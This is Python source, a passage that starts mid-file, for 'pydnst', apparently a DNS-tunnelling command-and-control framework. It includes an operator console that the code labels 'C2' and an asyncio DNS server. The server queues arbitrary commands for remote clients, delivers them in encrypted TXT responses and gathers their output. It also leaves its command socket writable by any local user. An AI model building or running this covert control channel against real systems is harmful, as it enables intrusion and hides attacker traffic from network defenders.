            print('Unknown argument : '+str(sys.argv[1]))
    elif sys.argv[1] == 'server' and sys.argv[2] == 'c2':
        c2 = pydnst.commander.Commander()
        c2.run()
    else:
        print('Unknown command : '+str(sys.argv[2]))
elif sys.argv[1] == 'create_certificates':
    create_certificates()
elif sys.argv[1] == 'shared_key':
    create_default_shared_key()
elif sys.argv[1] == 'config':    
    generate_config()
elif sys.argv[1] == '--help':
    print(HELP)
else:
    print(HELP)    
    
        



import os
import time
import json
import socket
from struct import Struct
from subprocess import call
import toml
import sys
try:
    from rich.live import Live as rich_live
    from rich import json as rich_json
    from rich import print as rich_print
    from rich.prompt import Prompt as rich_prompt
except Exception:
    pass

from .helpers import get_logger

PATH_CONFIG = 'pydnst.toml'
MSG_2_STRUCT = Struct('H') #2 bytes
MAX_COMMAND_LENGTH = 1000

class Commander:
    def __init__(self):
        self.logger = get_logger(logfile_path='pydnst_c2.log', logger_name='pydnst_c2')
        self.logger.info('Commander started')
        if not os.path.exists(PATH_CONFIG):
            logger.info(f'No config file at {PATH_CONFIG}, leaving ...')
            sys.exit(1)    
        with open(PATH_CONFIG,'r') as fd:
            config_toml = toml.load(fd)
        self.MESSAGES_JSON = config_toml['server']['MESSAGES_JSON']
        self.UDS_PATH_COMMANDER = config_toml['server']['UDS_PATH_COMMANDER']        

    def send_command(self, cmd, client_id):
        try:
            self.logger.info(f'Send to DnstServer : command {cmd[:100]} for client {client_id}')
            #command format : {'client_id':'', 'command':''}            
            payload = json.dumps({'client_id':client_id, 'command':cmd})
            header = MSG_2_STRUCT.pack(len(payload))
            message = header + payload.encode()
            sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            sock.connect(self.UDS_PATH_COMMANDER)            
            sock.sendall(message)
            resp = sock.recv(1000)  #just reads the "ok" response
            self.logger.info(f'Got {resp.decode()} from DnstServer')
            sock.close()
            self.logger.info('Command was sent to DnstServer')            
        except Exception:
            self.logger.exception('send_command')

    def rich_generate_json(self):
        res = json.dumps(self.get_info())
        res = rich_json.JSON(res)
        return res
                
    def rich_live_display_commands(self):
        call(['clear'])
        rich_print('[b]Welcome to pydnst C2 :alien_monster:')        
        rich_print('Live commands status (type ctrl-C to go back)')
        try:
            with rich_live(refresh_per_second=0.4) as live:
                while True:
                    try:
                        live.update(self.rich_generate_json())
                    except Exception as exc:
                        self.logger.exception('rich_generate_json')
                        res = json.dumps({"failure":str(exc)})
                        live.update(rich_json.JSON(res))
                        time.sleep(1)
                        raise
                    time.sleep(1)
        except:
            pass
        
    def get_info(self):
        messages_info = None
        if not os.path.exists(self.MESSAGES_JSON):
            return {}
        with open(self.MESSAGES_JSON, 'r') as fd:
            messages_info = json.load(fd)
        return messages_info    
    
    def show_clients(self, messages_info=None):
        if not messages_info:
            messages_info = self.get_info()
        return list(messages_info.keys())
    
    def dialog(self):
        while True:
            call(['clear'])
            rich_print('[b]Welcome to pydnst C2 :alien_monster:')            
            choice = rich_prompt.ask('\nShow commands status (s) / Send a new command (c) / Quit (q)', choices=['s', 'c', 'q'])
            if choice == 's':
                self.rich_live_display_commands()
            elif choice == 'c':
                clients = self.show_clients()
                client_id = rich_prompt.ask(f'\nPlease select a client (or "q" to cancel) : {clients}')
                if client_id == 'q':
                    continue
                if client_id not in clients:
                    rich_print(f'Invalid client {client_id}')
                    break
                command = rich_prompt.ask(f'\nPlease enter your command for client {client_id} (or "q" to cancel)')
                if command == 'q':
                    continue
                command = command[:MAX_COMMAND_LENGTH]
                self.send_command(command, client_id)
                self.rich_live_display_commands()
            elif choice == 'q':
                self.logger.info('Quitting')
                return
    
    def run(self):
        try:
            self.dialog()
        except Exception:
            self.logger.exception('run')
        except:
            self.logger.info('Commander stopped')



import os
import asyncio
from subprocess import check_output
from scapy.all import DNS, DNSQR, DNSRR, raw
import weakref
import json
from collections import OrderedDict
from struct import Struct
import random
import time
from datetime import datetime
import stat
import shutil
import sys
from copy import deepcopy
import hashlib
import toml
from cryptography.hazmat.backends import default_backend as crypto_default_backend
from cryptography.hazmat.primitives.asymmetric import padding as crypto_padding
from cryptography.hazmat.primitives import serialization as crypto_serialization, hashes as crypto_hashes

from .helpers import get_logger, PYTHON_GREATER_37
from .message import MessageBuilder

logger = None
PATH_CONFIG = 'pydnst.toml'

RESPOND_TO_KEEP_ALIVE = True
RESPOND_ACK_TO_FRAGMENTS = True #True
SERVER_SENDS_RSA_KEY_HASH_CONFIRMATION = False #True
SERVER_SENDS_RSA_KEY_HASH_CONFIRMATION = SERVER_SENDS_RSA_KEY_HASH_CONFIRMATION and RESPOND_ACK_TO_FRAGMENTS

MSG_2_STRUCT = Struct('H') #2 bytes
KA_COMMAND_ID = '0' #keep-alive command_id is 0
RSA_COMMAND_ID = '1'
ACK_COMMAND_ID = '2'
COMMANDS_WITHOUT_ENCRYPTION = (KA_COMMAND_ID, RSA_COMMAND_ID, ACK_COMMAND_ID)
COMMANDS_WITHOUT_ACK = (KA_COMMAND_ID, ACK_COMMAND_ID)  #with REQUEST_NEXT_FROM_SERVER and REQUEST_RSA_KEY_HASH_FROM_SERVER
MIN_COMMAND_ID = 3

REQUEST_NEXT_FROM_SERVER = b'nextpls'
REQUEST_RSA_KEY_HASH_FROM_SERVER = b'cfrmpls'


class DnstServerProtocol(asyncio.DatagramProtocol):
    def __init__(self, tunnel_messages, tunnel_mng_messages, store_ordered_tunnel_messages, pending_fragments_to_send_events,
                         server_private_key, shared_keys, DNST_SERVER_NAME, FILTERED_QUERY_NAMES, DEFAULT_SHARED_KEY):
        self.loop = asyncio.get_event_loop()
        self.is_server = True        
        self.dnst_id = '0'
        self.transport = None
        self.DNST_SERVER_NAME = DNST_SERVER_NAME
        self.FILTERED_QUERY_NAMES = FILTERED_QUERY_NAMES
        self.DEFAULT_SHARED_KEY = DEFAULT_SHARED_KEY
        self.message_builder = MessageBuilder(logger, weakref.proxy(self), self.DNST_SERVER_NAME, self.DEFAULT_SHARED_KEY)
        self.max_data_length = self.message_builder.max_data_length['response']        
        if self.message_builder.max_fragment_payload_sizes['response']['TXT'] < 1:
            logger.error(f'Cannot work with too long domain name {self.DNST_SERVER_NAME}')     
            sys.exit(1)
        #we enforce keep-alive to be only 1 fragment, by limiting the client_details size
        self.received_fragments = {}    # {client_id : {command_id : {'date':'', 'list_of_fragments':[]} } , }
        #tunnel_messages stored in MESSAGES_JSON : 
        #{client_id :  {command_id : {'command_awaiting_ka | command_sent' : '', 'date' : '', 'response' : ''} }, }
        self.tunnel_messages, self.store_ordered_tunnel_messages = tunnel_messages , store_ordered_tunnel_messages
        self.pending_fragments_to_send_events = pending_fragments_to_send_events
        self.server_private_key, self.shared_keys = server_private_key, shared_keys
        self.tunnel_mng_messages = tunnel_mng_messages
        
    
    def connection_made(self, transport):
        self.peername = transport.get_extra_info('peername')
        if self.peername:
            logger.info(f'connection_made from : {self.peername}')
        self.transport = transport
        super().connection_made(transport)

    def datagram_received(self, data, addr):
        try:
            self.remote_address, self.remote_port = self.peername = addr
            logger.debug(f'datagram_received from {self.peername} : {data}')
            super().datagram_received(data, addr)
            data_scapy = DNS(data)
            qname_scapy = data_scapy.qd.qname
            if qname_scapy.rstrip(b'.') in self.FILTERED_QUERY_NAMES:
                return                         
            if self.DNST_SERVER_NAME not in qname_scapy:
                return
            logger.info(f'datagram_received from {self.peername} : {data}')            
            logger.debug(f'Parsed datagram received : {DNS(data).show(dump=True)}')
            res = self.message_builder.reassemble_fragment(qname_scapy)
            if res is False:
                return
            
            client_id, command_id, fragment_id, number_of_fragments, is_ready = res
            if RESPOND_ACK_TO_FRAGMENTS:                
                if command_id not in COMMANDS_WITHOUT_ACK:
                    #event_desc = self.pending_fragments_to_send_events.get(client_id, {}).get(command_id, None)
                    #if event_desc:
                    #    logger.info(f'During sending of pending fragments : Not responding ack to non last fragment {is_ready} for client {client_id} and command {command_id}')
                    #    self.received_fragments[client_id].pop(command_id, None)
                    ##    self.send_next_fragment(client_id, command_id, 'TXT', addr, data_scapy)
                    #    return
                    send_ack = True
                    message_entry = self.tunnel_mng_messages.get(command_id, {}).get(client_id, None)
                    if message_entry:
                        if message_entry.startswith(REQUEST_NEXT_FROM_SERVER):
                            logger.info(f'tunnel_mng_messages : Not sending ack to a REQUEST_NEXT_FROM_SERVER to fragment {fragment_id} out of {number_of_fragments} for client {client_id} and command {command_id}')                        
                            send_ack = False
                        elif message_entry.startswith(REQUEST_RSA_KEY_HASH_FROM_SERVER):                
                            logger.info(f'tunnel_mng_messages : Not sending ack to a REQUEST_RSA_KEY_HASH_FROM_SERVER to fragment {fragment_id} out of {number_of_fragments} for client {client_id} and command {command_id}')
                            send_ack = False
                    message_entry = self.tunnel_messages.get(client_id, {}).get(command_id, {}).get('command_sent', None)
                    if message_entry:
                        if message_entry.encode().startswith(REQUEST_NEXT_FROM_SERVER):
                            logger.info(f'tunnel_messages : Not sending ack to a REQUEST_NEXT_FROM_SERVER to fragment {fragment_id} out of {number_of_fragments} for client {client_id} and command {command_id}')                        
                            send_ack = False
                        elif message_entry.encode().startswith(REQUEST_RSA_KEY_HASH_FROM_SERVER):                
                            logger.info(f'tunnel_messages : Not sending ack to a REQUEST_RSA_KEY_HASH_FROM_SERVER to fragment {fragment_id} out of {number_of_fragments} for client {client_id} and command {command_id}')
                            send_ack = False                        
                    if send_ack:     
                        logger.info(f'Responding ack to fragment {fragment_id} out of {number_of_fragments} for client {client_id} and command {command_id}')                        
                        ack_response = str(fragment_id) + '-' + str(random.randint(1,256))    #send ack with the fragment index in is_ready
                        self.send_data(ack_response.encode(), ACK_COMMAND_ID, client_id, addr,
                                                    rtype='TXT', data_scapy=data_scapy)                
            if is_ready is not True:                    
                return
            if self.server_private_key:
                if command_id in (RSA_COMMAND_ID, ACK_COMMAND_ID):
                    message_entry = self.tunnel_mng_messages[command_id].pop(client_id, b'')
                    if message_entry:
                        if message_entry.startswith(REQUEST_RSA_KEY_HASH_FROM_SERVER):
                            if SERVER_SENDS_RSA_KEY_HASH_CONFIRMATION:
                                hasher = hashlib.sha256()
                                hasher.update(self.shared_keys[client_id])
                                shared_key_hash = hasher.digest()
                                logger.info(f'Sending shared_key hash response for client {client_id}')
                                shared_key_hash_response = self.server_private_key.sign(
                                    shared_key_hash,
                                    crypto_padding.PSS(
                                        mgf=crypto_padding.MGF1(crypto_hashes.SHA256()),
                                        salt_length=crypto_padding.PSS.MAX_LENGTH
                                    ),
                                    crypto_hashes.SHA256()
                                )    
                                self.send_data(shared_key_hash_response, RSA_COMMAND_ID, client_id, addr,
                                                                   rtype='TXT', data_scapy=data_scapy)
                            return
                        elif command_id == RSA_COMMAND_ID: 
                            if message_entry.startswith(REQUEST_NEXT_FROM_SERVER):
                                event_desc = self.pending_fragments_to_send_events.get(client_id, {}).get(command_id, None)                            
                                if event_desc:
                                    try:
                                        fragment_acked = int(message_entry.split(b'-')[1])
                                    except Exception:
                                        logger.exception(f'Invalid REQUEST_NEXT_FROM_SERVER content received from client {client_id} : {message_entry}')
                                        return
                                    logger.info(f'Received request from client {client_id} and command {command_id} to send next rsa fragment, after fragment {fragment_acked} was acked')                                
                                    self.send_next_fragment(client_id, command_id, fragment_acked, 'TXT', addr, data_scapy)
                                else:
                                    logger.info(f'Received request from client {client_id} and command {command_id} to send next rsa fragment, but no pending fragment')
                                return
                            logger.info(f'Received shared_key for client {client_id}, decrypting it')
                            self.shared_keys[client_id] = self.server_private_key.decrypt(
                                            message_entry,
                                            crypto_padding.OAEP(
                                            mgf=crypto_padding.MGF1(algorithm=crypto_hashes.SHA256()),
                                            algorithm=crypto_hashes.SHA256(),
                                            label=None
                                        ))
                                                    
                            self.message_builder.use_shared_key_for_client(client_id, self.shared_keys[client_id])
                    return
                elif client_id not in self.shared_keys:
                    logger.info(f'Received command {command_id} from client {client_id} without having a shared_key for that client, asking one...')
                    hasher = hashlib.sha256()
                    hasher.update(b'Asking for a shared_key')    #dummy error message, anything different from the real shared_key_hash will lead the client to send it again
                    ask_for_shared_key = hasher.digest()                    
                    server_response = self.server_private_key.sign(
                        ask_for_shared_key,
                        crypto_padding.PSS(
                            mgf=crypto_padding.MGF1(crypto_hashes.SHA256()),
                            salt_length=crypto_padding.PSS.MAX_LENGTH
                        ),
                        crypto_hashes.SHA256()
                    )    
                    self.send_data(server_response, RSA_COMMAND_ID, client_id, addr,
                                                       rtype='TXT', data_scapy=data_scapy)
                    return                    
            
            tunnel_messages = self.tunnel_messages[client_id]
            if command_id == KA_COMMAND_ID:
                logger.info(f'Received keep-alive from {client_id}, with transaction id {data_scapy.id}, and name {qname_scapy}')
                #check if there is a command to send for this client
                for cmd_id in tunnel_messages:
                    if cmd_id != KA_COMMAND_ID and (tunnel_messages[cmd_id].get('command_awaiting_ka') or ( tunnel_messages[cmd_id].get('command_sent') and not tunnel_messages[cmd_id].get('response'))):
                        command_to_send = tunnel_messages[cmd_id].pop('command_awaiting_ka', None)
                        if command_to_send is None:
                            #this can happen with weird dns servers sending cached requests with delay
                            command_to_send = tunnel_messages[cmd_id]['command_sent']
                            logger.info('Trying to send again command {cmd_id} : {command_to_send}')                                
                        logger.info(f'There is a command to send to this client {client_id} : {command_to_send}')
                        tunnel_messages[cmd_id]['command_sent'] = command_to_send
                        self.store_ordered_tunnel_messages(self.tunnel_messages)
                        self.send_data(command_to_send.encode(), cmd_id, client_id, addr, rtype='TXT', data_scapy=data_scapy)
                        break
                else:
                    if RESPOND_TO_KEEP_ALIVE:
                        dummy_response = str(random.randint(1,256))
                        logger.info(f'No command to send to client {client_id}, sending dummy response {dummy_response} to keep-alive')
                        self.send_data(dummy_response.encode(), KA_COMMAND_ID, client_id, addr,
                                                           rtype='TXT', data_scapy=data_scapy)
                    else:
                        logger.info(f'No command to send to client {client_id}')                            
                                                
            else:
                command_sent = self.tunnel_messages.get(client_id, {}).get(command_id, {}).get('command_sent', None)
                message_entry = self.tunnel_messages.get(client_id, {}).get(command_id, {}).get('response', None)
                if message_entry:                    
                    logger.info(f'Received valid response to command {command_sent} from client {client_id} with transaction id {data_scapy.id}')                    
                    #the response was already written in self.tunnel_messages by message.reassemble_fragment
                    if message_entry.encode().startswith(REQUEST_NEXT_FROM_SERVER):
                        event_desc = self.pending_fragments_to_send_events.get(client_id, {}).get(command_id, None)                        
                        if event_desc:
                            try:
                                fragment_acked = int(message_entry.split(b'-')[1])
                            except Exception:
                                logger.exception(f'Invalid REQUEST_NEXT_FROM_SERVER content received from client {client_id} : {message_entry}')
                                return
                            logger.info(f'Received request from client {client_id} and command {command_id} to send next fragment, after fragment {fragment_acked} was acked')                                
                            self.send_next_fragment(client_id, command_id, fragment_acked, 'TXT', addr, data_scapy)
                        else:
                            logger.info(f'Received request from client {client_id} and command {command_id} to send next fragment, but no pending fragment')                        
                        return
                else:
                    logger.info(f'Received valid response but no matching client {client_id} and command {command_id}. Ignoring...')                    
        except Exception:
            logger.exception('datagram_received')
            try:
                logger.error(f'invalid datagram_received from {self.peername} : {data}')
            except Exception:
                pass

    def send_data(self, data, command_id, client_id, addr, rtype='TXT', data_scapy=None, without_encryption=False):
        logger.info(f'Sending data of length {len(data)}')
        if command_id in COMMANDS_WITHOUT_ENCRYPTION:
            without_encryption = True
        if len(data) > self.max_data_length:
            logger.info(f'Truncating data of length {len(data)} to {self.max_data_length}')
            data = data[:self.max_data_length]
        fragments = self.message_builder.fragmenter(data, rtype, client_id, command_id, is_dns_response=True,
                                                    without_encryption=without_encryption)
        self.loop.create_task(self.send_fragments(command_id, client_id, fragments, rtype, addr, data_scapy))
        
    async def send_fragments(self, command_id, client_id, fragments, rtype, addr, data_scapy=None):
        logger.info(f'Starting send_fragments task for transaction id {data_scapy.id}')
        number_of_fragments = len(fragments)
        logger.info(f'Sending fragment 1 out of {number_of_fragments}')
        if number_of_fragments > 1:
            #prepare mechanism for sending of multiple fragments
            if client_id not in self.pending_fragments_to_send_events:
                self.pending_fragments_to_send_events[client_id] = {}
            self.pending_fragments_to_send_events[client_id][command_id] = {'list':deepcopy(fragments), 'number_of_fragments':number_of_fragments}
        self.send_message(fragments[0], rtype, addr, data_scapy)

    def send_next_fragment(self, client_id, command_id, fragment_acked, rtype, addr, data_scapy):
        #next fragments will be sent on the next udp sockets querying them
        pointer = self.pending_fragments_to_send_events[client_id][command_id]
        pointer_list = pointer['list']
        if not all([(el is True) for el in pointer_list]):
            pointer_list[fragment_acked-1] = True    #True means this fragment was successfully acked by client
            for index in range(len(pointer_list)):
                fragment = pointer_list[index]
                if fragment is not True:
                    logger.info(f'Sending fragment {index+1} out of {pointer["number_of_fragments"]}')
                    self.send_message(fragment, rtype, addr, data_scapy)
                    break
        if all([(el is True) for el in pointer_list]):
            self.pending_fragments_to_send_events[client_id].pop(command_id)
            if not self.pending_fragments_to_send_events[client_id]:
                self.pending_fragments_to_send_events.pop(client_id)
        
    def send_message(self, dns_data, rtype, addr, data_scapy=None):
        logger.info(f'Starting send_message task for transaction id {data_scapy.id} to addr {addr}')
        logger.debug(f'Reusing query qd {data_scapy.show(dump=True)}')
        message = raw(DNS(qr=1, id=data_scapy.id, aa=1, rd=0, qd=data_scapy.qd, an=DNSRR(rdata=dns_data, ttl=0,
                                                    rrname=data_scapy.qd.qname, type=rtype)))
        logger.info(f'Sending message {message}, with data {dns_data}, and type {rtype}')
        self.transport.sendto(message, addr)

    def error_received(self, exc):
        logger.warning(f'error_received : {exc}')

    def connection_lost(self, exc):
        logger.info(f'connection_lost from : {self.peername}, {exc}')
        super().connection_lost(exc)


class DnstServer:

    def __init__(self):
        global logger
        logger = get_logger(logger_name='pydnst_server')

        if not os.path.exists(PATH_CONFIG):
            logger.info(f'No config file at {PATH_CONFIG}, leaving ...')
            sys.exit(1)    
        with open(PATH_CONFIG,'r') as fd:
            config_toml = toml.load(fd)
        config_server = config_toml['server']
        self.LISTENING_INTERFACE = config_server['LISTENING_INTERFACE']
        self.LISTENING_PORT = config_server['LISTENING_PORT']
        self.SERVER_PRIVATE_PEM_PATH = config_server['SERVER_PRIVATE_PEM_PATH']
        self.MESSAGES_JSON = config_server['MESSAGES_JSON']
        self.UDS_PATH_COMMANDER = config_server['UDS_PATH_COMMANDER']

        self.DNST_SERVER_NAME = DNST_SERVER_NAME = config_toml['general']['DNST_SERVER_NAME'].encode()
        self.FILTERED_QUERY_NAMES = (DNST_SERVER_NAME, b'ns1.'+DNST_SERVER_NAME, b'ns2.'+DNST_SERVER_NAME,
                        b'www.'+DNST_SERVER_NAME, b'www.ns1.'+DNST_SERVER_NAME, b'www.ns2.'+DNST_SERVER_NAME, 
                        b'_dmarc.'+DNST_SERVER_NAME)
        self.DEFAULT_SHARED_KEY = config_toml['general']['DEFAULT_SHARED_KEY'].encode()
        
        try:
            self.LISTENING_ADDRESS = check_output(f"ip --brief addr show {self.LISTENING_INTERFACE} | awk -F ' ' '{{ print $3 }}' | cut -d '/' -f 1", shell=True).strip().decode()
        except Exception:
            logger.exception('Cannot obtain eth0 ip address to listen on')
            print('Cannot obtain eth0 ip address to listen on')
            raise
        self.uds_path_commander = self.UDS_PATH_COMMANDER
        self.tunnel_messages = {}
        self.tunnel_mng_messages = {RSA_COMMAND_ID:{}, ACK_COMMAND_ID:{}}
        self.pending_fragments_to_send_events = {}
        
        try:
            with open(self.MESSAGES_JSON, 'w') as fd:
                json.dump({}, fd)
        except Exception:
            logger.exception('init')
            
        self.server_private_key = None
        self.shared_keys = {}        
        if os.path.exists(self.SERVER_PRIVATE_PEM_PATH):
            logger.info('Using a server private pem')            
            try:
                with open(self.SERVER_PRIVATE_PEM_PATH, 'rb') as key_file:
                    self.server_private_key = crypto_serialization.load_pem_private_key(
                        key_file.read(),
                        password=None,
                        backend=crypto_default_backend()
                    )
            except Exception:
                logger.exception('server_private_key')

    def store_ordered_tunnel_messages(self, tunnel_messages):
        #replace command_id 0 by 'keep-alive' in json_display (stored json self.MESSAGES_JSON)
        json_display = {}
        for key,value in tunnel_messages.items():
            new_value = {}
            for key1,value1 in value.items():
                new_value[key1 if key1 != '0' else 'keep-alive'] = value1
            json_display[key] = new_value
            
        #order display by date (per client)
        res = OrderedDict({kk:json_display[kk] for kk in sorted(json_display,
                   key=lambda ke: json_display[ke][list(json_display[ke].keys())[0]]['date'], reverse=True)})
    
        new_res = OrderedDict()
        for key,vdict in res.items():
            new_res[key] = OrderedDict({kk:vdict[kk] for kk in sorted(vdict, key=lambda ke: vdict[ke]['date'], reverse=True)})
    
        with open(self.MESSAGES_JSON, 'w') as fd:
            json.dump(new_res, fd, indent=4)    

    def generate_command_id(self):
        return str(random.randint(MIN_COMMAND_ID,256))
        
    async def commander_cb(self, reader, writer):
        #header of 2 bytes telling the length to read
        try:
            logger.info('commander_cb was called')
            next_length_bytes = await reader.readexactly(MSG_2_STRUCT.size)
            next_length = MSG_2_STRUCT.unpack(next_length_bytes)[0]
            command_to_send = await asyncio.wait_for(reader.readexactly(next_length), timeout=5)
            command_json = json.loads(command_to_send.decode())
            client_id = command_json['client_id']
            command = command_json['command']
            now = datetime.fromtimestamp(time.time()).strftime(r'%Y-%m-%d--%H:%M:%S')
            command_id = self.generate_command_id()
            if client_id not in self.tunnel_messages:
                logger.warning(f'Client {client_id} not found in tunnel_messages {self.tunnel_messages}. Ignoring ...')
                return
            self.tunnel_messages[client_id][command_id] = {'command_awaiting_ka':command, 'date':now}
            self.store_ordered_tunnel_messages(self.tunnel_messages)
            writer.write(b'ok')
            try:
                await asyncio.wait_for(writer.drain(), timeout=5)
            except Exception:
                logger.exception('commander_cb writer drain')
            logger.info(f'Command {command} was successfully added to tunnel_messages for client {client_id}')
        except asyncio.CancelledError:
            raise            
        except Exception:
            logger.exception('commander_cb')
        finally:
            writer.close()
            if PYTHON_GREATER_37:
                try:
                    await writer.wait_closed()      #python 3.7                                              
                except Exception as exc:
                    logger.warning('commander_cb writer.wait_closed : '+str(exc))            
        
    async def run_command_listener(self):
        logger.info('Starting command listener')
        self.commander_server = await asyncio.start_unix_server(self.commander_cb, path=self.uds_path_commander)
        #for convenience we want non root to be able to use the c2 commander        
        os.chmod(self.uds_path_commander, stat.S_IRWXU | stat.S_IRWXG | stat.S_IROTH | stat.S_IWOTH)
        
    def run(self):
        try:
            self.loop = asyncio.get_event_loop()
            logger.info(f'DnstServer listening on {self.LISTENING_ADDRESS}:{self.LISTENING_PORT}')
            dnst_server_task = self.loop.create_datagram_endpoint(lambda :DnstServerProtocol(
                                                                self.tunnel_messages, self.tunnel_mng_messages,
                                                                self.store_ordered_tunnel_messages, self.pending_fragments_to_send_events,
                                                                self.server_private_key, self.shared_keys, self.DNST_SERVER_NAME,
                                                                self.FILTERED_QUERY_NAMES, self.DEFAULT_SHARED_KEY),
                                                                local_addr=(self.LISTENING_ADDRESS, self.LISTENING_PORT))
            transport, protocol = self.loop.run_until_complete(dnst_server_task)
            self.loop.run_until_complete(self.run_command_listener())
            self.loop.run_forever()
        except Exception:
            logger.exception('run')       
        except:
            logger.info('DnstServer stopped')            
        finally:
            try:
                shutil.copy(self.MESSAGES_JSON, self.MESSAGES_JSON+'.bk')
                os.remove(self.MESSAGES_JSON)
                transport.close()
            except Exception:
                pass

    
